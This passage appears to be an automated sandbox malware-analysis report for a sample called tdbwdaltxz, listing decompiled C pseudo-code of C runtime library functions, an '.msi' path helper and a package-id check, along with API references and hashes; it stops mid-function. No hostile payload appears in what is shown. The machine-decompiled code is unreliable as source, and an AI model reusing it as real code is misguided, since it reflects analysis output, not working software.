                        0x01074c78
                        0x00000000
                        0x00000000
                        0x01074c63
                        0x01074c63
                        0x01074c6b
                        0x01074c6d
                        0x01074c7a
                        0x01074c7b
                        0x00000000
                        0x00000000
                        0x00000000
                        0x01074c6d
                        0x01074c61
                        0x01074c81
                        0x01074c88
                        0x01074d0a
                        0x01074d0e
                        0x01074d13
                        0x01074d14
                        0x01074d15
                        0x01074d1c
                        0x01074d21
                        0x01074d27
                        0x00000000
                        0x01074c8a
                        0x01074c8a
                        0x01074c92
                        0x01074c97
                        0x01074c9c
                        0x01074c9f
                        0x01074ca2
                        0x01074ca4
                        0x01074cbd
                        0x01074cc0
                        0x01074cdd
                        0x01074cdd
                        0x01074cc2
                        0x01074cc2
                        0x01074cc5
                        0x00000000
                        0x01074cc7
                        0x01074cd4
                        0x01074cd4
                        0x01074cc5
                        0x01074ce2
                        0x01074ce6
                        0x00000000
                        0x01074ce8
                        0x01074ce8
                        0x01074cea
                        0x01074ceb
                        0x01074cec
                        0x01074ced
                        0x01074cf7
                        0x01074cfa
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x01074cfa
                        0x01074ca6
                        0x01074ca6
                        0x01074ca7
                        0x01074ca8
                        0x01074cb1
                        0x01074cfc
                        0x01074cff
                        0x01074d02
                        0x01074d29
                        0x01074d29
                        0x01074d2c
                        0x01074d39
                        0x01074d2e
                        0x01074d2e
                        0x01074d2e
                        0x01074d2e
                        0x01074d2e
                        0x00000000
                        0x01074d2e
                        0x01074d2c
                        0x01074ca4
                        0x01074c2e
                        0x01074c2e
                        0x01074c31
                        0x01074c34
                        0x01074cb8
                        0x01074d32
                        0x01074d32
                        0x01074c36
                        0x01074c39
                        0x01074c39
                        0x01074c3c
                        0x01074c3e
                        0x00000000
                        0x01074c3e
                        0x01074c34
                        0x01074c0d
                        0x01074c12
                        0x00000000
                        0x01074c12
                        0x01074bfb
                        0x01074c00
                        0x01074c18
                        0x01074c18
                        0x01074c1c
                        0x01074c1c
                        0x01074d40
                        0x01074be0
                        0x01074be4
                        0x01074be4

                        APIs
                        • __ioinit.LIBCMT ref: 01074BD7
                          • Part of subcall function 01066594: InitOnceExecuteOnce.KERNEL32(01081050,010665CF,00000000,00000000,01062FAF,0107DF38,0000000C,01062084,-00000040,Unknown option "%c" in Repair mode), ref: 010665A2
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: Once$ExecuteInit__ioinit
                        • String ID:
                        • API String ID: 129814473-0
                        • Opcode ID: e0f898912dc74ef25ecc3fa0492e44df95631676b5c13e5c07da1bfa3a2d9e93
                        • Instruction ID: 1610157736473a1e1fae61af9aeaa4d07d59c8a1a30f03a90ba830bb9c5c767e
                        • Opcode Fuzzy Hash: e0f898912dc74ef25ecc3fa0492e44df95631676b5c13e5c07da1bfa3a2d9e93
                        • Instruction Fuzzy Hash: 74416871E0070A9FE7749F6CC881ABA7BE8AF41320F00866DE5E6C76C1D774D8008B18
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0106793B Relevance: 9.1, APIs: 6, Instructions: 134COMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 88%
                        			E0106793B(void* __eflags, signed char _a4, signed int* _a8) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t43;
				signed int _t44;
				signed int _t45;
				signed int _t48;
				signed int _t52;
				void* _t60;
				signed int _t62;
				void* _t64;
				signed int _t67;
				signed int _t70;
				signed int _t74;
				signed int _t76;
				void* _t77;
				signed int _t85;
				void* _t86;
				signed int _t87;
				signed int _t89;
				signed int* _t92;

				_t44 = E01066594(_t43);
				if(_t44 >= 0) {
					_t92 = _a8;
					_t45 = E01065573(_t92);
					_t74 = _t92[3];
					_t89 = _t45;
					__eflags = _t74 & 0x00000082;
					if(__eflags != 0) {
						__eflags = _t74 & 0x00000040;
						if(__eflags == 0) {
							_t70 = 0;
							__eflags = _t74 & 0x00000001;
							if((_t74 & 0x00000001) == 0) {
								L10:
								_t48 = _t92[3] & 0xffffffef | 0x00000002;
								_t92[3] = _t48;
								_t92[1] = _t70;
								__eflags = _t48 & 0x0000010c;
								if((_t48 & 0x0000010c) == 0) {
									_t60 = E01062E24();
									__eflags = _t92 - _t60 + 0x20;
									if(_t92 == _t60 + 0x20) {
										L13:
										_t62 = E0106FFFD(_t89);
										__eflags = _t62;
										if(_t62 == 0) {
											goto L14;
										}
									} else {
										_t64 = E01062E24();
										__eflags = _t92 - _t64 + 0x40;
										if(_t92 != _t64 + 0x40) {
											L14:
											E01070A65(_t92);
										} else {
											goto L13;
										}
									}
								}
								__eflags = _t92[3] & 0x00000108;
								if((_t92[3] & 0x00000108) == 0) {
									__eflags = 1;
									_push(1);
									_v8 = 1;
									_push( &_a4);
									_push(_t89);
									_t45 = E0106BEF0(_t70, _t86, _t89, _t92, 1);
									_t70 = _t45;
									goto L27;
								} else {
									_t87 = _t92[2];
									 *_t92 = _t87 + 1;
									_t76 =  *_t92 - _t87;
									_v8 = _t76;
									_t92[1] = _t92[6] - 1;
									__eflags = _t76;
									if(__eflags <= 0) {
										__eflags = _t89 - 0xffffffff;
										if(_t89 == 0xffffffff) {
											L22:
											_t77 = 0x1080520;
										} else {
											__eflags = _t89 - 0xfffffffe;
											if(_t89 == 0xfffffffe) {
												goto L22;
											} else {
												_t77 = ((_t89 & 0x0000001f) << 6) +  *((intOrPtr*)(0x1081c60 + (_t89 >> 5) * 4));
											}
										}
										__eflags =  *(_t77 + 4) & 0x00000020;
										if(__eflags == 0) {
											goto L25;
										} else {
											_push(2);
											_push(_t70);
											_push(_t70);
											_push(_t89);
											_t45 = E01067780(_t70, _t89, _t92, __eflags) & _t87;
											__eflags = _t45 - 0xffffffff;
											if(_t45 == 0xffffffff) {
												goto L28;
											} else {
												goto L25;
											}
										}
									} else {
										_push(_t76);
										_push(_t87);
										_push(_t89);
										_t70 = E0106BEF0(_t70, _t87, _t89, _t92, __eflags);
										L25:
										_t45 = _a4;
										 *(_t92[2]) = _t45;
										L27:
										__eflags = _t70 - _v8;
										if(_t70 == _v8) {
											_t52 = _a4 & 0x000000ff;
										} else {
											L28:
											_t40 =  &(_t92[3]);
											 *_t40 = _t92[3] | 0x00000020;
											__eflags =  *_t40;
											goto L29;
										}
									}
								}
							} else {
								_t92[1] = 0;
								__eflags = _t74 & 0x00000010;
								if((_t74 & 0x00000010) == 0) {
									_t92[3] = _t74 | 0x00000020;
									L29:
									_t52 = _t45 | 0xffffffff;
								} else {
									_t85 = _t74 & 0xfffffffe;
									__eflags = _t85;
									 *_t92 = _t92[2];
									_t92[3] = _t85;
									goto L10;
								}
							}
						} else {
							_t67 = E010647CC(__eflags);
							 *_t67 = 0x22;
							goto L6;
						}
					} else {
						_t67 = E010647CC(__eflags);
						 *_t67 = 9;
						L6:
						_t92[3] = _t92[3] | 0x00000020;
						_t52 = _t67 | 0xffffffff;
					}
					return _t52;
				} else {
					return _t44 | 0xffffffff;
				}
			}


























                        0x0106793f
                        0x01067946
                        0x0106794e
                        0x01067953
                        0x01067959
                        0x0106795c
                        0x0106795e
                        0x01067961
                        0x01067970
                        0x01067973
                        0x0106798d
                        0x0106798f
                        0x01067992
                        0x010679a7
                        0x010679ad
                        0x010679b0
                        0x010679b3
                        0x010679b6
                        0x010679bb
                        0x010679bd
                        0x010679c5
                        0x010679c7
                        0x010679d5
                        0x010679d6
                        0x010679dc
                        0x010679de
                        0x00000000
                        0x00000000
                        0x010679c9
                        0x010679c9
                        0x010679d1
                        0x010679d3
                        0x010679e0
                        0x010679e1
                        0x00000000
                        0x00000000
                        0x00000000
                        0x010679d3
                        0x010679c7
                        0x010679e7
                        0x010679ee
                        0x01067a6c
                        0x01067a6d
                        0x01067a6e
                        0x01067a74
                        0x01067a75
                        0x01067a76
                        0x01067a7e
                        0x00000000
                        0x010679f0
                        0x010679f0
                        0x010679f8
                        0x010679fd
                        0x01067a00
                        0x01067a03
                        0x01067a06
                        0x01067a08
                        0x01067a21
                        0x01067a24
                        0x01067a41
                        0x01067a41
                        0x01067a26
                        0x01067a26
                        0x01067a29
                        0x00000000
                        0x01067a2b
                        0x01067a38
                        0x01067a38
                        0x01067a29
                        0x01067a46
                        0x01067a4a
                        0x00000000
                        0x01067a4c
                        0x01067a4c
                        0x01067a4e
                        0x01067a4f
                        0x01067a50
                        0x01067a56
                        0x01067a5b
                        0x01067a5e
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x01067a5e
                        0x01067a0a
                        0x01067a0a
                        0x01067a0b
                        0x01067a0c
                        0x01067a15
                        0x01067a60
                        0x01067a63
                        0x01067a66
                        0x01067a80
                        0x01067a80
                        0x01067a83
                        0x01067a8e
                        0x01067a85
                        0x01067a85
                        0x01067a85
                        0x01067a85
                        0x01067a85
                        0x00000000
                        0x01067a85
                        0x01067a83
                        0x01067a08
                        0x01067994
                        0x01067994
                        0x01067997
                        0x0106799a
                        0x01067a1c
                        0x01067a89
                        0x01067a89
                        0x0106799c
                        0x0106799f
                        0x0106799f
                        0x010679a2
                        0x010679a4
                        0x00000000
                        0x010679a4
                        0x0106799a
                        0x01067975
                        0x01067975
                        0x0106797a
                        0x00000000
                        0x0106797a
                        0x01067963
                        0x01067963
                        0x01067968
                        0x01067980
                        0x01067980
                        0x01067984
                        0x01067984
                        0x01067a96
                        0x01067948
                        0x0106794c
                        0x0106794c

                        APIs
                        • __ioinit.LIBCMT ref: 0106793F
                          • Part of subcall function 01066594: InitOnceExecuteOnce.KERNEL32(01081050,010665CF,00000000,00000000,01062FAF,0107DF38,0000000C,01062084,-00000040,Unknown option "%c" in Repair mode), ref: 010665A2
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: Once$ExecuteInit__ioinit
                        • String ID:
                        • API String ID: 129814473-0
                        • Opcode ID: 7aef140c0198f581e698c8ad672e976f625a149ae038e71e5567d6e94c47cc1d
                        • Instruction ID: f43c7404a44f9850386674598a63ed7ce2cd16e4b5c1863153e69f98d1c160e3
                        • Opcode Fuzzy Hash: 7aef140c0198f581e698c8ad672e976f625a149ae038e71e5567d6e94c47cc1d
                        • Instruction Fuzzy Hash: EC411171510B029FD7249BACC891ABE7BEC9F85338F04875DE5E6C62C1E634DA408B21
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0106C92A Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 96%
                        			E0106C92A(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				long _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				long _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					__eflags = _t31;
					if(_t31 != 0) {
						_push(__ebx);
						while(1) {
							__eflags = _t31 - 0xffffffe0;
							if(_t31 > 0xffffffe0) {
								break;
							}
							__eflags = _t31;
							if(_t31 == 0) {
								_t31 = _t31 + 1;
								__eflags = _t31;
							}
							_t7 = HeapReAlloc( *0x1081688, 0, _a4, _t31);
							_t20 = _t7;
							__eflags = _t20;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								__eflags =  *0x1081c20 - _t7;
								if(__eflags == 0) {
									_t9 = E010647CC(__eflags);
									 *_t9 = E01064825(GetLastError());
									goto L17;
								} else {
									__eflags = E0106CE35(_t7, _t31);
									if(__eflags == 0) {
										_t12 = E010647CC(__eflags);
										 *_t12 = E01064825(GetLastError());
										L12:
										_t8 = 0;
										__eflags = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E0106CE35(_t6, _t31);
						 *((intOrPtr*)(E010647CC(__eflags))) = 0xc;
						goto L12;
					} else {
						E01064ED2(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E0106C898(__ebx, __edx, __edi, _a8);
				}
			}









                        0x0106c931
                        0x0106c93f
                        0x0106c942
                        0x0106c944
                        0x0106c953
                        0x0106c986
                        0x0106c986
                        0x0106c989
                        0x00000000
                        0x00000000
                        0x0106c956
                        0x0106c958
                        0x0106c95a
                        0x0106c95a
                        0x0106c95a
                        0x0106c967
                        0x0106c96d
                        0x0106c96f
                        0x0106c971
                        0x0106c9d1
                        0x0106c9d1
                        0x0106c973
                        0x0106c973
                        0x0106c979
                        0x0106c9bb
                        0x0106c9cf
                        0x00000000
                        0x0106c97b
                        0x0106c982
                        0x0106c984
                        0x0106c9a3
                        0x0106c9b7
                        0x0106c99d
                        0x0106c99d
                        0x0106c99d
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0106c984
                        0x0106c979
                        0x00000000
                        0x0106c99f
                        0x0106c98c
                        0x0106c997
                        0x00000000
                        0x0106c946
                        0x0106c949
                        0x0106c94f
                        0x0106c94f
                        0x0106c9a0
                        0x0106c9a2
                        0x0106c933
                        0x0106c93d
                        0x0106c93d

                        APIs
                        • _malloc.LIBCMT ref: 0106C936
                          • Part of subcall function 0106C898: __FF_MSGBANNER.LIBCMT ref: 0106C8AF
                          • Part of subcall function 0106C898: __NMSG_WRITE.LIBCMT ref: 0106C8B6
                          • Part of subcall function 0106C898: RtlAllocateHeap.NTDLL(00B90000,00000000,00000001,00000000,00000000,00000000,?,01064F6A,00000000,00000000,00000000,00000000,?,01064E22,00000018,0107E060), ref: 0106C8DB
                        • _free.LIBCMT ref: 0106C949
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: AllocateHeap_free_malloc
                        • String ID:
                        • API String ID: 1020059152-0
                        • Opcode ID: 32185979ca455c04534635abed220d5a2d4870b092aeca5e669a4269303301d0
                        • Instruction ID: dc3f8c792e18c9b39980655d1c4aa36fb946f7055c4604235f5f4dabf39aaf76
                        • Opcode Fuzzy Hash: 32185979ca455c04534635abed220d5a2d4870b092aeca5e669a4269303301d0
                        • Instruction Fuzzy Hash: C611C632905317AFEB322FB8AD4C69E37ECAF142B0B104566F9C9DA140DB358850C7E4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0106D939 Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 92%
                        			E0106D939(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				LONG* _t20;
				signed int _t25;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t24 = __ebx;
				_push(0xc);
				_push(0x107e2f0);
				E010668F0(__ebx, __edi, __esi);
				_t31 = E0106B2AD(__edx, __edi, _t35);
				_t25 =  *0x1080e04; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t25) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E01064D39(0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x10806ac; // 0xba2248
					if(__eflags != 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							__eflags = InterlockedDecrement(_t33);
							if(__eflags == 0) {
								__eflags = _t33 - 0x10809a8;
								if(__eflags != 0) {
									E01064ED2(_t33);
								}
							}
						}
						_t20 =  *0x10806ac; // 0xba2248
						 *(_t31 + 0x68) = _t20;
						_t33 =  *0x10806ac; // 0xba2248
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E0106D9D5();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				_t38 = _t33;
				if(_t33 == 0) {
					E0106526F(_t24, _t29, _t31, _t33, _t38, 0x20);
				}
				return E01066935(_t33);
			}









                        0x0106d939
                        0x0106d939
                        0x0106d939
                        0x0106d939
                        0x0106d93b
                        0x0106d940
                        0x0106d94a
                        0x0106d94c
                        0x0106d955
                        0x0106d976
                        0x0106d97c
                        0x0106d980
                        0x0106d983
                        0x0106d986
                        0x0106d98c
                        0x0106d98e
                        0x0106d990
                        0x0106d999
                        0x0106d99b
                        0x0106d99d
                        0x0106d9a3
                        0x0106d9a6
                        0x0106d9ab
                        0x0106d9a3
                        0x0106d99b
                        0x0106d9ac
                        0x0106d9b1
                        0x0106d9b4
                        0x0106d9ba
                        0x0106d9be
                        0x0106d9be
                        0x0106d9c4
                        0x0106d9cb
                        0x0106d95d
                        0x0106d95d
                        0x0106d95d
                        0x0106d960
                        0x0106d962
                        0x0106d966
                        0x0106d96b
                        0x0106d973

                        APIs
                          • Part of subcall function 0106B2AD: __getptd_noexit.LIBCMT ref: 0106B2AE
                          • Part of subcall function 0106B2AD: __amsg_exit.LIBCMT ref: 0106B2BB
                        • __amsg_exit.LIBCMT ref: 0106D966
                        • __lock.LIBCMT ref: 0106D976
                        • InterlockedDecrement.KERNEL32(?), ref: 0106D993
                        • _free.LIBCMT ref: 0106D9A6
                        • InterlockedIncrement.KERNEL32(00BA2248), ref: 0106D9BE
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock_free
                        • String ID:
                        • API String ID: 1231874560-0
                        • Opcode ID: 8555e3c5df406a3017f085eac47d66e16d9b02c4bd34fcc7c726227daad61377
                        • Instruction ID: b9d5ca4917e66ae5fc41927d23d8c33c99505101a283fcf1d3cb919651eef13f
                        • Opcode Fuzzy Hash: 8555e3c5df406a3017f085eac47d66e16d9b02c4bd34fcc7c726227daad61377
                        • Instruction Fuzzy Hash: BD01D672F006229FDB71BFA894047AE7BA9BF05720F140145E8C0B7284C7345540CFE1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 010753DE Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                        Download Yara Rule
                        C-Code - Quality: 91%
                        			E010753DE(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t24;
				void* _t35;
				intOrPtr* _t37;
				void* _t38;
				void* _t39;

				_t39 = __eflags;
				_push(0xc);
				_push(0x107e4d8);
				E010668F0(__ebx, __edi, __esi);
				_t35 = E0106B2AD(__edx, __edi, _t39);
				_t37 = E01064F0A(8, 1);
				 *((intOrPtr*)(_t38 - 0x1c)) = _t37;
				_t40 = _t37;
				if(_t37 != 0) {
					E010702E6(__ebx, __edx, _t35, _t37, __eflags);
					E0106D939(__ebx, __edx, _t35, _t37, __eflags);
					 *_t37 =  *((intOrPtr*)(_t35 + 0x6c));
					 *(_t37 + 4) =  *(_t35 + 0x68);
					E01064D39(0xc);
					_t5 = _t38 - 4;
					 *_t5 =  *(_t38 - 4) & 0x00000000;
					__eflags =  *_t5;
					E01070061( *_t37);
					 *(_t38 - 4) = 0xfffffffe;
					E01075A98();
					E01064D39(0xd);
					 *(_t38 - 4) = 1;
					InterlockedIncrement( *(_t37 + 4));
					 *(_t38 - 4) = 0xfffffffe;
					E01075AA4();
					_t24 = _t37;
				} else {
					 *((intOrPtr*)(E010647CC(_t40))) = 0xc;
					_t24 = 0;
				}
				return E01066935(_t24);
			}








                        0x010753de
                        0x010759fe
                        0x01075a00
                        0x01075a05
                        0x01075a0f
                        0x01075a1c
                        0x01075a1e
                        0x01075a21
                        0x01075a23
                        0x01075a34
                        0x01075a39
                        0x01075a41
                        0x01075a46
                        0x01075a4b
                        0x01075a51
                        0x01075a51
                        0x01075a51
                        0x01075a57
                        0x01075a5d
                        0x01075a64
                        0x01075a6b
                        0x01075a71
                        0x01075a7b
                        0x01075a81
                        0x01075a88
                        0x01075a8d
                        0x01075a25
                        0x01075a2a
                        0x01075a30
                        0x01075a30
                        0x01075a94

                        APIs
                          • Part of subcall function 0106B2AD: __getptd_noexit.LIBCMT ref: 0106B2AE
                          • Part of subcall function 0106B2AD: __amsg_exit.LIBCMT ref: 0106B2BB
                        • __calloc_crt.LIBCMT ref: 01075A15
                          • Part of subcall function 01064F0A: __calloc_impl.LIBCMT ref: 01064F19
                          • Part of subcall function 01064F0A: Sleep.KERNEL32(00000000), ref: 01064F30
                        • __lock.LIBCMT ref: 01075A4B
                        • ___addlocaleref.LIBCMT ref: 01075A57
                        • __lock.LIBCMT ref: 01075A6B
                        • InterlockedIncrement.KERNEL32(?), ref: 01075A7B
                          • Part of subcall function 010647CC: __getptd_noexit.LIBCMT ref: 010647CC
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: __getptd_noexit__lock$IncrementInterlockedSleep___addlocaleref__amsg_exit__calloc_crt__calloc_impl
                        • String ID:
                        • API String ID: 2144732038-0
                        • Opcode ID: f1cd610e63fba6d31f2805fe87c25fbff99a76ffa80d2a92f7f4f44875e4b6d3
                        • Instruction ID: 1043acd6d51f1a49f064483d55129c3b0f617311525d146038d6eae68df51e63
                        • Opcode Fuzzy Hash: f1cd610e63fba6d31f2805fe87c25fbff99a76ffa80d2a92f7f4f44875e4b6d3
                        • Instruction Fuzzy Hash: 59015A71E41303EEE721BFA498457DC77A0AF65B20F204659E4D4AA2C0CE7559418B69
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 01061860 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35stringCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E01061860(WCHAR* _a4) {
				signed int _t12;
				signed int _t13;
				WCHAR* _t14;

				_t14 = _a4;
				lstrcpyW(_t14, _a4);
				_t13 = lstrlenW(_t14);
				if(_t13 == 0) {
					L6:
					if(_t14[_t13] != 0x2e) {
						lstrcatW(_t14, L".msi");
						return _t14;
					} else {
						return 0;
					}
				}
				while(1) {
					_t12 = _t14[_t13] & 0x0000ffff;
					if(_t12 == 0x2e || _t12 == 0x5c || _t12 == 0x2f) {
						goto L6;
					}
					_t13 = _t13 - 1;
					if(_t13 != 0) {
						continue;
					}
					goto L6;
				}
				goto L6;
			}






                        0x01061867
                        0x0106186b
                        0x01061878
                        0x0106187c
                        0x01061896
                        0x0106189b
                        0x010618aa
                        0x010618b4
                        0x0106189d
                        0x010618a1
                        0x010618a1
                        0x0106189b
                        0x01061880
                        0x01061880
                        0x01061887
                        0x00000000
                        0x00000000
                        0x01061893
                        0x01061894
                        0x00000000
                        0x00000000
                        0x00000000
                        0x01061894
                        0x00000000

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: lstrcatlstrcpylstrlen
                        • String ID: .msi
                        • API String ID: 3050337572-299543723
                        • Opcode ID: 3b09ad3a8fbdbe7cdc998e1f4faaa26930044050e93616d21fe2138c483037aa
                        • Instruction ID: 2b28503e8b71544921f1983f65dbd0f03f0ede55411e0eb7ba914dc37040f837
                        • Opcode Fuzzy Hash: 3b09ad3a8fbdbe7cdc998e1f4faaa26930044050e93616d21fe2138c483037aa
                        • Instruction Fuzzy Hash: F7F05536A012146F8F761B9D94084BEBBDCEFD56A23544866F6C4C6100DB34C4A083D0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0106BB78 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMON
                        Download Yara Rule
                        C-Code - Quality: 33%
                        			E0106BB78(void* __ecx) {
				signed int _v8;
				_Unknown_base(*)()* _t5;

				_v8 = _v8 & 0x00000000;
				_t5 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetCurrentPackageId");
				if(_t5 == 0) {
					L3:
					return 0;
				} else {
					_push(0);
					_push( &_v8);
					if( *_t5() != 0x7a) {
						goto L3;
					} else {
						return 1;
					}
				}
			}





                        0x0106bb7c
                        0x0106bb91
                        0x0106bb99
                        0x0106bbad
                        0x0106bbb0
                        0x0106bb9b
                        0x0106bb9b
                        0x0106bba0
                        0x0106bba6
                        0x00000000
                        0x0106bba8
                        0x0106bbac
                        0x0106bbac
                        0x0106bba6

                        APIs
                        • GetModuleHandleW.KERNEL32(kernel32.dll,GetCurrentPackageId), ref: 0106BB8A
                        • GetProcAddress.KERNEL32(00000000), ref: 0106BB91
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: AddressHandleModuleProc
                        • String ID: GetCurrentPackageId$kernel32.dll
                        • API String ID: 1646373207-142416881
                        • Opcode ID: 53a7a10c1d36222a13d0a6c38533c6d58b2c9b7ab5289691280d944f4fca133f
                        • Instruction ID: ea2607807590a304c42193e561659faa15b428e87842daefd1ed2d67b785583c
                        • Opcode Fuzzy Hash: 53a7a10c1d36222a13d0a6c38533c6d58b2c9b7ab5289691280d944f4fca133f
                        • Instruction Fuzzy Hash: F0E0C272FA030866EB2567F1EC0AF5B369C9700649F100858B197F1080DAB8D20182A4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 010615A0 Relevance: 6.3, APIs: 5, Instructions: 60memorystringCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E010615A0(void* __ecx, WCHAR* _a4) {
				WCHAR* _v8;
				WCHAR* _t15;
				int _t20;
				intOrPtr* _t22;
				void* _t27;
				int _t29;
				intOrPtr* _t32;
				WCHAR* _t33;
				WCHAR* _t35;
				WCHAR* _t36;

				_t22 = _a4;
				_t27 = 1;
				_t32 = _t22;
				if(_t22 != 0) {
					do {
						_t20 = lstrlenW(_t32 + 4);
						_t32 =  *_t32;
						_t27 = _t27 + 1 + _t20;
					} while (_t32 != 0);
				}
				_t15 = HeapAlloc(GetProcessHeap(), 0, _t27 + _t27);
				_t33 = _t15;
